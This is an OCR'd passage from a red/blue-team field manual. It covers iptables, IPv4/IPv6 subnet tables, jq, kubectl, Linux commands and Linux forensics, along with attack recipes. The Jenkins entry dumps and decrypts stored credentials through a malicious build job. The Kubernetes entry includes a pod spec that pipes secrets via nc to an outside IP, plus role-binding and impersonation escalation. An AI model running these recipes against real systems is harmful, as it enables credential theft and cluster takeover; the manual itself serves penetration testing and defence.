# iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j
ACCEPT

98
Allow outbound current established connections:
# iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT

I I
IPv4
ALL INFORMATIONAL N/A

IPv4 PRIVATE RANGES

Class Size Mask Range
[Link]
A [Link]/8 [Link] [Link]
[Link]
B [Link]/12 [Link] [Link]
[Link]
C [Link]/16 [Link] [Link]

IPv4 PUBLIC SUBNET CLASSES

Class Size Mask Range Hosts
[Link]
A [Link]/8 [Link] [Link] 16,777,214
[Link]
B [Link]/16 [Link] [Link] 65,534
[Link]
C [Link]/24 [Link] [Link] 254

IPv4 CLASS C SUBNET TABLE

Subnet Addresses Netmask # of Class C
/31 2 [Link] 1/128
/30 4 [Link] 1/64
/29 8 [Link] 1/32
/28 16 [Link] 1/16
/27 32 [Link] 1/8
/26 64 [Link] 1/4
/25 128 [Link] 1/2
/24 256 [Link] 1
/23 512 [Link] 2
/22 1024 [Link] 4
/21 2048 [Link] 8
/20 4096 [Link] 16
/19 8192 [Link] 32
/18 16384 [Link] 64
/17 32768 [Link] 128
/16 65536 [Link] 256
/15 131072 [Link] 512
/14 262144 [Link] 1024

99
 /13 524288 [Link] 2048
/12 1048576 [Link] 4096
/11 2097152 [Link] 8192
/10 4194304 [Link] 16384
/9 8388608 [Link] 32768
/8 16777216 [Link] 65536

I I
IPv6
ALL INFORMATIONAL N/A

BROADCAST ADDRESSES
ff01::2 Node-Local Routers
ff02::1 Link-Local Nodes
ff02::2 Link-Local Routers
ff05::1 Site-Local Nodes
ff05::2 Site-Local Routers

IPv6 SIZE
Amount of a
Sub # of Addresses /64
/128 1
/127 2
/126 4
/125 8
/124 16
/123 32
/122 64
/121 128
/120 256
/119 512
/118 1,024
/117 2,048
/116 4,096
/115 8,192
/114 16,384
/113 32,768
/112 65,536
/111 131,072
/110 262,144
/109 524,288
/108 1,048,576
/107 2,097,152
/106 4,194,304
/105 8,388,608

100
 Equivalent
to an IPv4
Internet or
/104 16,777,216 IPv4 /8
/103 33,554,432
/102 67,108,864
/101 134,217,728
/100 268,435,456
/99 536,870,912
/98 1,073,741,824
/97 2,147,483,648
/96 4,294,967,296
/95 8,589,934,592
/94 17,179,869,184
/93 34,359,738,368
/92 68,719,476,736
/91 137,438,953,472
/90 274,877,906,944
/89 549,755,813,888
/88 1,099,511,627,776
/87 2,199,023,255,552 1/8,388,608
/86 4,398,046,511,104 1/4,194,304
/85 8,796,093,022,208 1/2,097,152
/84 17,592,186,044,416 1/1,048,576
/83 35,184,372,088,832 1/524,288
/82 70,368,744,177,664 1/262,144
/81 140,737,488,355,328 1/131,072
/80 281,474,976,710,656 1/65,536
/79 562,949,953,421,312 1/32,768
/78 1,125,899,906,842,620 1/16,384
/77 2,251,799,813,685,240 1/8,192
/76 4,503,599,627,370,490 1/4,096
/75 9,007,199,254,740,990 1/2,048
/74 18,014,398,509,481,900 1/1,024
/73 36,028,797,018,963,900 1/512
/72 72,057,594,037,927,900 1/256
/71 144,115,188,075,855,000 1/128
/70 288,230,376,151,711,000 23377
/69 576,460,752,303,423,000 11689
/68 1,152,921,504,606,840,000 43846
/67 2,305,843,009,213,690,000 43838
/66 4,611,686,018,427,380,000 43834
/65 9,223,372,036,854,770,000 43832
Standard
end user
/64 18,446,744,073,709,500,000 allocation
/63 36,893,488,147,419,100,000 2
/62 73,786,976,294,838,200,000 4
/61 147,573,952,589,676,000,000 8
/60 295,147,905,179,352,000,000 16

101
/59 590,295,810,358,705,000,000 32
/58 1,180,591,620,717,410,000,000 64
/57 2,361,183,241,434,820,000,000 128
/56 4,722,366,482,869,640,000,000 256
/55 9,444,732,965,739,290,000,000 512
/54 18,889,465,931,478,500,000,000 1024
/53 37,778,931,862,957,100,000,000 2048
/52 75,557,863,725,914,300,000,000 4096
/51 151,115,727,451,828,000,000,000 8192
/50 302,231,454,903,657,000,000,000 16384
/49 604,462,909,807,314,000,000,000 32768
65,536
Standard
business
/48 1,208,925,819,614,620,000,000,000 allocation
/47 2,417,851,639,229,250,000,000,000 131072
/46 4,835,703,278,458,510,000,000,000 262144
/45 9,671,406,556,917,030,000,000,000 524288
/44 19,342,813,113,834,000,000,000,000 1048576
/43 38,685,626,227,668,100,000,000,000 2097152
/42 77,371,252,455,336,200,000,000,000 4194304
/41 154,742,504,910,672,000,000,000,000 8388608
/40 309,485,009,821,345,000,000,000,000 16777216
/39 618,970,019,642,690,000,000,000,000 33554432
/38 1,237,940,039,285,380,000,000,000,000 67108864
/37 2,475,880,078,570,760,000,000,000,000 134217728
/36 4,951,760,157,141,520,000,000,000,000 268435456
/35 9,903,520,314,283,040,000,000,000,000 536870912
/34 19,807,040,628,566,000,000,000,000,000 1073741824
/33 39,614,081,257,132,100,000,000,000,000 2147483648
4,294,967,2
96 Standard
ISP
/32 79,228,162,514,264,300,000,000,000,000 Allocation
/31 158,456,325,028,528,000,000,000,000,000 8589934592
/30 316,912,650,057,057,000,000,000,000,000 17179869184
/29 633,825,300,114,114,000,000,000,000,000 34359738368
/28 1,267,650,600,228,220,000,000,000,000,000 68719476736
/27 2,535,301,200,456,450,000,000,000,000,000
/26 5,070,602,400,912,910,000,000,000,000,000
/25 10,141,204,801,825,800,000,000,000,000,000
/24 20,282,409,603,651,600,000,000,000,000,000
/23 40,564,819,207,303,300,000,000,000,000,000
/22 81,129,638,414,606,600,000,000,000,000,000
/21 162,259,276,829,213,000,000,000,000,000,000
/20 324,518,553,658,426,000,000,000,000,000,000
/19 649,037,107,316,853,000,000,000,000,000,000
1,298,074,214,633,700,000,000,000,000,000,00
/18 0

102
 2,596,148,429,267,410,000,000,000,000,000,00
/17 0
5,192,296,858,534,820,000,000,000,000,000,00
/16 0
10,384,593,717,069,600,000,000,000,000,000,0
/15 00
20,769,187,434,139,300,000,000,000,000,000,0
/14 00
41,538,374,868,278,600,000,000,000,000,000,0
/13 00
83,076,749,736,557,200,000,000,000,000,000,0
/12 00
166,153,499,473,114,000,000,000,000,000,000,
/11 000
332,306,998,946,228,000,000,000,000,000,000,
/10 000
664,613,997,892,457,000,000,000,000,000,000,
/9 000
1,329,227,995,784,910,000,000,000,000,000,00
/8 0,000

IPv6 BIT MAPPING

XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX
||| |||| |||| |||| |||| |||| ||||
||| |||| |||| |||| |||| |||| |||128
||| |||| |||| |||| |||| |||| ||124
||| |||| |||| |||| |||| |||| |120
||| |||| |||| |||| |||| |||| 116
||| |||| |||| |||| |||| |||112
||| |||| |||| |||| |||| ||108
||| |||| |||| |||| |||| |104
||| |||| |||| |||| |||| 100
||| |||| |||| |||| |||96
||| |||| |||| |||| ||92
||| |||| |||| |||| |88
||| |||| |||| |||| 84
||| |||| |||| |||80
||| |||| |||| ||76
||| |||| |||| |72
||| |||| |||| 68
||| |||| |||64
||| |||| ||60
||| |||| |56
||| |||| 52
||| |||48
||| ||44
||| |40
||| 36
||32
|28

103
 24

J
J J
JENKINS_Exploit
RED TEAM ESCALATE PRIVS DEVOPS

Dump Credentials From Jenkins

SCENARIO: You’ve obtained credentials for a user with build job
privileges on a Jenkins server. With that user you can now dump all
the credentials on the Jenkins server and decrypt them by creating
a malicious build job.

STEP 1: Log into the Jenkins server with the obtained user account:
[Link]

STEP 2: Find an obscure location to run your build job and follow
the below navigational tree:
New Item -> Freeform Build

“New Project”-> Configure -> General -> Restrict Where This Is Run
-> Enter “Master” -> Build -> Add Build Step -> Execute Shell

STEP 3: Execute the following commands in the shell:

echo ""
echo "[Link]"
cat ${JENKINS_HOME}/[Link]
echo ""
echo "[Link]"

104
cat ${JENKINS_HOME}/secrets/[Link] | base64 -w 0
echo ""
echo "[Link]"
cat ${JENKINS_HOME}/secrets/[Link] | base64 -w 0

STEP 4: Save the build job and on the “Jobs” view page click “Build
Now”
STEP 5: Navigate to “Build History” and click on your build job
number. Then click on “Console Output”.
STEP 6: Copy the text of the “[Link]” and place it into a
local file on your attack workstation named “[Link]”

STEP 7: Copy the base64 encoded “[Link]” and

“[Link]” and decode them into their own files on your
local attack workstation:
echo <base64 string [Link]> | base64 --decode > [Link]
echo <base64 string [Link]> | base64 --decode >
[Link]

STEP 8: Download the “jenkins-decrypt” python script:

[Link]

STEP 9: Decrypt the “[Link]” file using “[Link]” and

“[Link]”:
[Link] <[Link]> <[Link]> <[Link]>

J J
JOHN THE RIPPER
RED TEAM PASSWORD CRACKING ALL
John the Ripper is a fast password cracker, currently available for
many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS.

ATTACK MODES
BRUTEFORCE ATTACK
john --format=#type [Link]
DICTIONARY ATTACK
john --format=#type --wordlist=[Link] [Link]
MASK ATTACK
john --format=#type --mask=?l?l?l?l?l?l [Link] -min-len=6
INCREMENTAL ATTACK
john --incremental [Link]
DICTIONARY + RULES ATTACK
john --format=#type --wordlist=[Link] --rules

RULES
--rules=Single
--rules=Wordlist

105
--rules=Extra
--rules=Jumbo
--rules=KoreLogic
--rules=All

INCREMENT
--incremental=Digits
--incremental=Lower
--incremental=Alpha
--incremental=Alnum

PARALLEL CPU or GPU

LIST OpenCL DEVICES
john --list=opencl-devices
LIST OpenCL FORMATS
john --list=formats --format=opencl
MULTI-GPU (example 3 GPU’s)
john --format=<OpenCLformat> [Link] --wordlist=[Link] --rules -
-dev=<#> --fork=3
MULTI-CPU (example 8 cores)
john --wordlist=[Link] [Link] --rules --dev=<#> --fork=8

MISC
BENCHMARK TEST
john --test
SESSION NAME
john [Link] --session=example_name
SESSION RESTORE
john --restore=example_name
SHOW CRACKED RESULTS
john [Link] --pot=<john potfile> --show
WORDLIST GENERATION
john --wordlist=[Link] --stdout --external:[filter name] >
[Link]

BASIC ATTACK METHODOLOGY

1- DEFAULT ATTACK
john [Link]
2- DICTIONARY + RULES ATTACK
john --wordlist=[Link] --rules
3- MASK ATTACK
john --mask=?l?l?l?l?l?l [Link] -min-len=6
4- BRUTEFORCE INCREMENTAL ATTACK
john --incremental [Link]

J J
JQ
ALL INFORMATIONAL N/A

106
jq - jq is a fantastic command-line JSON processor. jq is a sed-
like tool that is specifically built to deal with JSON.

###EXAMPLE [Link] CONTENTS

{
"name": "Buster",
"breed": "Golden Retriever",
"age": "4",
"owner": {
"name": "Sally"
},
"likes": [
"bones",
"balls",
"dog biscuits"
]
}

Pretty print JSON output

cat [Link] | jq

Find a Key and Value

cat [Link] | jq '.name'
#mutltiple keys can be passed with '.name,.age'

Nested Search Operation

cat [Link] | jq '.[Link]'

Find Items in an Array

cat [Link] | jq '.likes[0]'
#multiple array elements '.likes[0:2]'

Combine Filters
cat [Link] | jq '.[] | .name'

Transform JSON into new data structures

cat [Link] | jq '[.name, .likes[]]'

Transform Values within JSON

Perform basic arithmetic on number values.
{ "eggs": 2, "cheese": 1, "milk": 1 }
cat [Link] | jq '.eggs + 1'
3

Remove Keys from JSON

cat [Link] | jq 'del(.name)'

Map Values & Perform Operations

107
echo '[12,14,15]' | jq 'map(.-2)'
[
10,
12,
13
]

REFERENCE:
[Link]
[Link]
[Link]

K
K K
KUBERNETES
ALL INFORMATIONAL DEVOPS
Kubernetes is an open-source container-orchestration system for
automating application deployment, scaling, and management. It was
originally designed by Google and is now maintained by the Cloud
Native Computing Foundation.

REFERENCE:
[Link]

K K
KUBERNETES_Exploit
RED/BLUE TEAM VULN SCAN DEVOPS

108
kubeaudit
is a command line tool to audit Kubernetes clusters for various
different security concerns: run the container as a non-root user,
use a read only root filesystem, drop scary capabilities, don't add
new ones, don't run privileged, ...
[Link]

[Link]
Online security risk analysis for Kubernetes resources.
[Link]

kube-bench
is a Go application that checks whether Kubernetes is deployed
securely by running the checks documented in the CIS Kubernetes
Benchmark.
[Link]

katacoda
Online learn Kubernetes using interactive browser-based scenarios.
[Link]

RBAC Configuration
LISTING SECRETS
An attacker that gains access to list secrets in the cluster can
use the following curl commands to get all secrets in "kube-system"
namespace.
curl -v -H "Authorization: Bearer <jwt_token>"
[Link]

Kubernetes Secrets File Locations

In Kubernetes secrets such as passwords, api_tokens, and SSH keys
are stored “Secret”. Also be on the lookout for volume mount points
where secrets can be stored as well and referenced by the pod.

You can query what secrets are stored by issuing:

$ kubectl get secrets
$ kubectl describe secrets/<Name>

To decode a secret username or password perform the following:

$ echo '<base64_username_string>' | base64 –decode
$ echo '<base64_password_string>' | base64 --decode

POD CREATION
Check your rights with:
kubectl get role system:controller:bootstrap-signer -n kube-system
-o yaml
Then create a malicious [Link] file:
apiVersion: v1

109
kind: Pod
metadata:
name: alpine
namespace: kube-system
spec:
containers:
- name: alpine
image: alpine
command: ["/bin/sh"]
args: ["-c", 'apk update && apk add curl --no-cache; cat
/run/secrets/[Link]/serviceaccount/token | { read TOKEN;
curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type:
application/json"
[Link]
system/secrets; } | nc -nv [Link] 6666; sleep 100000']
serviceAccountName: bootstrap-signer
automountServiceAccountToken: true
hostNetwork: true
Then
kubectl apply -f [Link]

PRIVILEGE TO USE PODS/EXEC

kubectl exec -it <POD NAME> -n <PODS NAMESPACE> –- sh

PRIVILEGE TO GET/PATCH ROLEBINDINGS

The purpose of this JSON file is to bind the admin "ClusterRole" to
the compromised service account. Create a malicious
[Link] file:

{
"apiVersion": "[Link]/v1",
"kind": "RoleBinding",
"metadata": {
"name": "malicious-rolebinding",
"namespcaes": "default"
},
"roleRef": {
"apiGroup": "*",
"kind": "ClusterRole",
"name": "admin"
},
"subjects": [
{
"kind": "ServiceAccount",
"name": "sa-comp"
"namespace": "default"
}
]
}

110
curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H
"Content-Type: application/json"
[Link]
aces/default/rolebindings -d @[Link]

Retrieve secrets with new compromised token access:

curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT
TOKEN>" -H "Content-Type: application/json"
[Link]

IMPERSONATING A PRIVILEGED ACCOUNT

curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the
impersonator)>" -H "Impersonate-Group: system:masters" -H
"Impersonate-User: null" -H "Accept: application/json"
[Link]

PRIVILEGED SERVICE ACCOUNT TOKEN

$ cat /run/secrets/[Link]/serviceaccount/token
$ curl -k -v -H "Authorization: Bearer <jwt_token>"
[Link]

ENUMERABLE ENDPOINTS
# List Pods
curl -v -H "Authorization: Bearer <jwt_token>"
[Link]

# List secrets
curl -v -H "Authorization: Bearer <jwt_token>"
[Link]

# List deployments
curl -v -H "Authorization: Bearer <jwt_token>"
[Link]
t/deployments

# List daemonsets
curl -v -H "Authorization: Bearer <jwt_token>"
[Link]
t/daemonsets

VARIOUS API ENDPOINTS

cAdvisor
curl -k [Link] Address>:4194

Insecure API server

curl -k [Link] Address>:8080

111
Secure API Server
curl -k [Link] Address>:(8|6)443/swaggerapi
curl -k [Link] Address>:(8|6)443/healthz
curl -k [Link] Address>:(8|6)443/api/v1

etcd API
curl -k [Link] address>:2379
curl -k [Link] address>:2379/version
etcdctl --endpoints=[Link] get / --prefix --keys-
only

Kubelet API
curl -k [Link] address>:10250
curl -k [Link] address>:10250/metrics
curl -k [Link] address>:10250/pods

kubelet (Read only)

curl -k [Link] Address>:10255
[Link]

REFERENCE:
[Link]
[Link]
1/
[Link]

K K
KUBECTL
ALL ADMINISTRATION DEVOPS
Kubectl is a command line tool for controlling Kubernetes clusters.

KUBECTL CONTEXT/CONFIGURE
use multiple
kubeconfig files
at the same time
and view merged
KUBECONFIG=~/.kube/config:~/.kube/kubconfig2 config
Show Merged
kubeconfig
kubectl config view settings.
kubectl config view -o
jsonpath='{.users[?(@.name == get the password
"e2e")].[Link]}' for the e2e user
kubectl config view -o display the first
jsonpath='{.users[].name}' user

112
kubectl config view -o get a list of
jsonpath='{.users[*].name}' users
display list of
kubectl config get-contexts contexts
display the
kubectl config current-context current-context
set the default
context to my-
kubectl config use-context my-cluster-name cluster-name
add a new cluster
kubectl config set-credentials to your kubeconf
kubeuser/[Link] -- that supports
username=kubeuser --password=kubepassword basic auth
permanently save
the namespace for
all subsequent
kubectl config set-context --current -- kubectl commands
namespace=ggckad-s2 in that context.
set a context
kubectl config set-context gce -- utilizing a
user=cluster-admin --namespace=foo && kubectl specific username
config use-context gce and namespace.
kubectl config unset [Link] delete user foo
CREATE OBJECTS
create
kubectl apply -f ./[Link] resource(s)
create from
kubectl apply -f ./[Link] -f ./[Link] multiple files
create
resource(s) in
all manifest
kubectl apply -f ./dir files in dir
create
resource(s) from
kubectl apply -f [Link] url
start a single
kubectl create deployment nginx --image=nginx instance of nginx
get the
documentation for
pod and svc
kubectl explain pods,svc manifests
VIEW/FIND RESOURCES
List all services
kubectl get services in the namespace
List all pods in
kubectl get pods --all-namespaces all namespaces
List all pods in
the current
namespace with
kubectl get pods -o wide more details

113
 List a particular
kubectl get deployment my-dep deployment
List all pods in
kubectl get pods the namespace
kubectl get pod my-pod -o yaml Get a pod's YAML
Get a pod's YAML
without cluster
specific
kubectl get pod my-pod -o yaml --export information
# Describe commands with verbose output
kubectl describe nodes my-node
kubectl describe pods my-pod
# List Services
kubectl get services --sort-by=.[Link] Sorted by Name
kubectl get pods --sort- # List pods
by='.[Link][0].restartCount Sorted by Restart
' Count
# List
PersistentVolumes
kubectl get pv --sort- sorted by
by=.[Link] capacity
# Get the version
kubectl get pods --selector=app=cassandra -o label of all pods
jsonpath='{.items[*].[Link]} with label
' app=cassandra
# Get all worker
nodes (use a
selector to
exclude results
that have a label
named 'node-
kubectl get node --selector='!node- [Link].i
[Link]/master' o/master')
# Get all running
kubectl get pods --field- pods in the
selector=[Link]=Running namespace
kubectl get nodes -o
jsonpath='{.items[*].[Link][?(@.typ # Get ExternalIPs
e=="ExternalIP")].address}' of all nodes
kubectl get pods -o json | jq
'.items[].[Link][].env[]?.valueFrom. # List all
[Link]' | grep -v null | sort | Secrets currently
uniq in use by a pod
# List Events
kubectl get events --sort- sorted by
by=.[Link] timestamp
# Compares the
current state of
the cluster
kubectl diff -f ./[Link] against the state

114
 that the cluster
would be in if
the manifest was
applied.
UPDATING RESOURCES
Rolling update
"www" containers
of "frontend"
deployment
kubectl set image deployment/frontend updating the
www=image:v2 image
Check the history
of deployments
including the
kubectl rollout history deployment/frontend revision
Rollback to the
previous
kubectl rollout undo deployment/frontend deployment
kubectl rollout undo deployment/frontend -- Rollback to a
to-revision=2 specific revision
Watch rolling
update status of
"frontend"
deployment until
kubectl rollout status -w deployment/frontend completion
Rolling restart
of the "frontend"
kubectl rollout restart deployment/frontend deployment
# deprecated starting version 1.11
(deprecated)
Rolling update
kubectl rolling-update frontend-v1 -f pods of frontend-
[Link] v1
(deprecated)
Change the name
of the resource
kubectl rolling-update frontend-v1 frontend- and update the
v2 --image=image:v2 image
(deprecated)
kubectl rolling-update frontend -- Update the pods
image=image:v2 image of frontend
(deprecated)
Abort existing
kubectl rolling-update frontend-v1 frontend- rollout in
v2 --rollback progress
Create a service
for a replicated
nginx which
kubectl expose rc nginx --port=80 --target- serves on port 80
port=8000 and connects to

115
 the containers on
port 8000
# Update a single-container pod's image
version (tag) to v4
kubectl get pod mypod -o yaml | sed
's/\(image: myimage\):.*$/\1:v4/' | kubectl
replace -f -kubectl label pods my-pod new-
label=awesome Add a Label
kubectl annotate pods my-pod icon-
url=[Link] Add an annotation
kubectl autoscale deployment foo --min=2 -- Auto scale a
max=10 deployment "foo"
EDITING RESOURCES
Edit the service
named docker-
kubectl edit svc/docker-registry registry
Use an
KUBE_EDITOR="nano" kubectl edit svc/docker- alternative
registry editor
SCALING RESOURCES
Scale a
replicaset named
kubectl scale --replicas=3 rs/foo 'foo' to 3
Scale a resource
specified in
kubectl scale --replicas=3 -f [Link] "[Link]" to 3
If the deployment
named mysql's
kubectl scale --current-replicas=2 -- current size is 2
replicas=3 deployment/mysql scale mysql to 3
Scale multiple
kubectl scale --replicas=5 rc/foo rc/bar replication
rc/baz controllers
DELETE RESOURCES
Delete a pod
using the type
and name
specified in
kubectl delete -f ./[Link] [Link]
Delete pods and
services with
same names "baz"
kubectl delete pod,service baz foo and "foo"
Delete pods and
services with
label
kubectl delete pods,services -l name=myLabel name=myLabel
Delete all pods
and services in
kubectl -n my-ns delete pod,svc --all namespace my-ns

116
kubectl get pods -n mynamespace --no- Delete all pods
headers=true | awk '/pattern1|pattern2/{print matching the awk
$1}' | xargs kubectl delete -n mynamespace pattern1 or
pod pattern2
INTERACT PODS
dump pod logs
kubectl logs my-pod (stdout)
dump pod logs
with label
name=myLabel
kubectl logs -l name=myLabel (stdout)
dump pod logs
(stdout) for a
previous
instantiation of
kubectl logs my-pod --previous a container
dump pod
container logs
(stdout multi-
kubectl logs my-pod -c my-container container case)
dump pod logs
with label
name=myLabel
kubectl logs -l name=myLabel -c my-container (stdout)
dump pod
container logs
(stdout multi-
container case)
for a previous
kubectl logs my-pod -c my-container -- instantiation of
previous a container
stream pod logs
kubectl logs -f my-pod (stdout)
stream pod
container logs
(stdout multi-
kubectl logs -f my-pod -c my-container container case)
stream all pods
logs with label
kubectl logs -f -l name=myLabel --all- name=myLabel
containers (stdout)
kubectl run -i --tty busybox --image=busybox Run pod as
-- sh interactive shell
Run pod nginx in
kubectl run nginx --image=nginx -- a specific
restart=Never -n mynamespace namespace
Run pod nginx and
write its spec
kubectl run nginx --image=nginx -- into a file
restart=Never =--dry-run -o yaml > [Link] called [Link]

117
 Attach to Running
kubectl attach my-pod -i Container
Listen on port
5000 on the local
machine and
forward to port
kubectl port-forward my-pod 5000:6000 6000 on my-pod
Run command in
existing pod (1
kubectl exec my-pod -- ls / container case)
Run command in
existing pod
(multi-container
kubectl exec my-pod -c my-container -- ls / case)
Show metrics for
a given pod and
kubectl top pod POD_NAME --containers its containers
INTERACTING NODES/CLUSTER
Mark my-node as
kubectl cordon my-node unschedulable
Drain my-node in
preparation for
kubectl drain my-node maintenance
Mark my-node as
kubectl uncordon my-node schedulable
Show metrics for
kubectl top node my-node a given node
Display addresses
of the master and
kubectl cluster-info services
Dump current
cluster state to
kubectl cluster-info dump stdout
Dump current
cluster state to
kubectl cluster-info dump --output- /path/to/cluster-
directory=/path/to/cluster-state state
RESOURCE TYPES
All namespaced
kubectl api-resources --namespaced=true resources
All non-
namespaced
kubectl api-resources --namespaced=false resources
All resources
with simple
output (just the
kubectl api-resources -o name resource name)
All resources
kubectl api-resources -o wide with expanded

118
 (aka "wide")
output
All resources
that support the
"list" and "get"
kubectl api-resources --verbs=list,get request verbs
All resources in
the "extensions"
kubectl api-resources --api-group=extensions API group

REFERENCE:
[Link]
[Link]
[Link]

L
L L
LINUX_Commands
ALL ADMINISTRATION LINUX

FILE SYSTEM
ls list items in current directory
list items in current directory
ls -l in long format
list all items in current
ls -a directory, including hidden files
list all items in current
directory and show directories
with a slash and executables with
ls -F a star
ls dir list all items in directory dir

119
cd dir change directory to dir
cd .. go up one directory
cd / go to the root directory
cd ~ go to to your home directory
cd - go to the last directory you were
pwd show present working directory
mkdir dir make directory dir
rm file remove file
rm -r dir remove directory dir recursively
cp file1 file2 copy file1 to file2
copy directory dir1 to dir2
cp -r dir1 dir2 recursively
mv file1 file2 move (rename) file1 to file2
ln -s file link create symbolic link to file
touch file create or update file
cat file output the contents of file
less file view file with page navigation
head file output the first 10 lines of file
tail file output the last 10 lines of file
output the contents of file as it
grows, starting with the last 10
tail -f file lines
vim file edit file
alias name 'command' create an alias for a command
SYSTEM
cat /etc/*release* OS version
cat /etc/issue OS version
cat /proc/version Kernel information
date show the current date and time
df show disk usage
du show directory space usage
finger user display information about user
free show memory and swap usage
last -a Users to login last
man command show the manual for command
mount Show any mounted file systems
nbtstat -A <IP> or <CIDR> Query hostname for IP or CIDR
reboot restart machine
shutdown shut down machine
uname -a CPU arch and kernel version
whereis app show possible locations of app
show which app will be run by
which app default
who -a Combined user information
whoami who you are logged in as
PROCESS ADMINISTRATION
display your currently active
ps -aef processes
top display all running processes
kill pid# kill process id pid

120
kill -9 pid# force kill process id pid
NETWORKING
echo "1" >
/proc/sys/net/ipv4/ip_forwar
d Enable IP forwarding
echo "nameserver <IP>" >
/etc/[Link] Insert a new DNS server
ifconfig <eth#> <IP>/<CIDR> Configure eth# interface IP
iwlist <wlan#> scan WiFi broadcast scan
lsof -i List open files connection status
List all processes running on
lsof -i tcp:80 port 80
netstat -ant Top tcp network connection status
netstat -anu Top udp network connection status
route add default gw <IP> Configure gateway IP
share <USER> <IP> C$ Mount Windows C share
smb://<IP>/IPC$ SMB connect Windows IPC share
smbclient -U <USER>
\\\\<IP>\\<SHARE> SMBclient connect to share
watch netstat -an Continuous network connect status
PERMISSIONS
list items by date in current
ls -lart directory and show permissions
change permissions of file to ugo
- u is the user's permissions, g
is the group's permissions, and o
is everyone else's permissions.
The values of u, g, and o can be
chmod ugo file any number between 0 and 7.
7 — full permissions
6 — read and write only
5 — read and execute only
4 — read only
3 — write and execute only
2 — write only
1 — execute only
0 — no permissions
you can read and write - good for
chmod 600 file files
you can read, write, and execute
chmod 700 file - good for scripts
you can read and write, and
everyone else can only read -
chmod 644 file good for web pages
you can read, write, and execute,
and everyone else can read and
execute - good for programs that
chmod 755 file you want to share
UTILITIES
curl <URL> -O download a file

121
dig -x host reverse lookup host
dig [Link] get DNS information for domain
dos2unix [Link] converts windows to unix format
list all processes running on
lsof -i tcp:80 port 80
ping host or IP and output
ping host results
secure copy the directory dir
from remote server to the
scp -r user@host:dir dir directory dir on your machine
secure copy a file from your
machine to the dir directory on a
scp file user@host:dir remote server
secure copy a file from remote
server to the dir directory on
scp user@host:file dir your machine
script -a [Link] record terminal to file
SSH connect to host on port as
ssh -p port user@host user
ssh user@host SSH connect to host as user
add your key to host for user to
enable a keyed or passwordless
ssh-copy-id user@host login
wget <URL> -O [Link] download a file
whois [Link] get information for domain
SEARCHING
grep pattern files search for pattern in files
search recursively for pattern in
grep -r pattern dir dir
search recursively for pattern in
dir and show the line number
grep -rn pattern dir found
search recursively for pattern in
grep -r pattern dir -- dir and only search in files
include='*.ext with .ext extension
search for pattern in the output
command | grep pattern of command
find all instances of file in
find file real system
find all instances of file using
indexed database built from the
updatedb command. Much faster
locate file than find
find all occurrences of day in a
file and replace them with night
- s means substitude and g means
global - sed also supports
sed -i 's/day/night/g' file regular expressions
COMPRESSION

122
 create a tar named [Link]
tar cf [Link] files containing files
tar xf [Link] extract the files from [Link]
create a tar with Gzip
tar czf [Link] files compression
tar xzf [Link] extract a tar using Gzip
compresses file and renames it to
gzip file [Link]
gzip -d [Link] decompresses [Link] back to file
zip -r <[Link]> \path\* Zip contents of directory
SHORTCUTS
ctrl+a move cursor to start of line
ctrl+f move cursor to end of line
alt+f move cursor forward 1 word
alt+b move cursor backward 1 word

REFERENCE:
[Link]

L L
LINUX_Defend
BLUE TEAM FORENSICS Linux

Evidence Collection Order of Volatility (RFC3227)

• Registers, cache
• Routing table, arp cache, process table, kernel statistics,
memory
• Temporary file systems
• Disk
• Remote logging and monitoring data that is relevant to the
system in question
• Physical configuration, network topology
• Archival media

LINUX ARTIFACT COLLECTION

System Information
date
uname –a
hostname
cat /proc/version
lsmod
service -status-all

Disk/Partition Information

123
fdisk -l

Open Files & Disk/Space Usage

lsof -i
du
df

Networking Configuration/Connections/Socket Stats

ifconfig -a
netstat -apetul
netstat -plan
netstat -plant
ss -l
ss -ta
ss -tp

User/Account Information
whoami
who
last
lastb
cat /var/log/[Link]
cat /etc/passwd
cat /etc/shadow
cat /etc/sudoers
cat /etc/sudoers.d/*
cut -d: -f1 /etc/passwd
getent passwd | cut -d: -f1
compgen -u
xclip -o

Processes/System Calls/Network Traffic

ps -s
ps -l
ps -o
ps -t
ps -m
ps -a
ps -aef
ps -auxwf
top
strace -f -e trace=network -s 10000 <PROCESS WITH ARGUMENTS>;
strace -f -e trace=network -s 10000 -p <PID>;

Environment/Startup/Tasks Information
cat /etc/profile
ls /etc/profile.d/
cat /etc/profile.d/*
ls /etc/cron.*

124
ls /etc/cron.*/*
cat /etc/cron.*/*
cat /etc/crontab
ls /etc/*.d
cat /etc/*.d/*
cat /etc/[Link]
cat ~/.bash_profile
cat ~/.bashrc

Kernel/Browser/PAM Plugins & Modules

ls -la /lib/modules/*/kernel/*
ls -la ~/.mozilla/plugins
ls -la /usr/lib/mozilla/plugins
ls -la /usr/lib64/mozilla/plugins
ls -la ~/.config/google-chrome/Default/Extensions/
cat /etc/pam.d/sudo
cat /etc/[Link]
ls /etc/pam.d/

Hidden Directories & Files

find / -type d -name ".*"

Immutable Files & Directories

lsattr / -R 2> /dev/null | grep "\----i"

SUID/SGID & Sticky Bit Special Permissions

find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -lg {}
\;

File & Directories with no user/group name

find / \( -nouser -o -nogroup \) -exec ls -lg {} \;

File types in current directory

file * -p

Executables on file system

find / -type f -exec file -p '{}' \; | grep ELF

Hidden Executables on file system

find / -name ".*" -exec file -p '{}' \; | grep ELF

Files modified within the past day

find / -mtime -1

Remotely Analyze Traffic Over SSH

ssh root@<IP/HOST> tcpdump -i any -U -s 0 -w - 'not port 22'

125
Persistence Areas of Interest
/etc/[Link]
/etc/initd
/etc/rc*.d
/etc/modules
/etc/cron*
/var/spool/cron/*

Audit Logs
ls -al /var/log/*
ls -al /var/log/*tmp
utmpdump /var/log/btmp
utmpdump /var/run/utmp
utmpdump /var/log/wtmp

PROCESS FORENSICS
Detailed Process Information
ls -al /proc/[PID]

NOTE:
cwd = Current Working Directory of Malware
exe = Binary location and whether it has been deleted

Recover Deleted Binary Currently Running

cp /proc/[PID]/exe /[destination]/[binaryname]

Capture Binary Data for Review

cp /proc/[PID]/ /[destination]/[PID]/

Binary Hash Information

sha1sum /[destination]/[binaryname]
md5sum /[destination]/[binaryname]

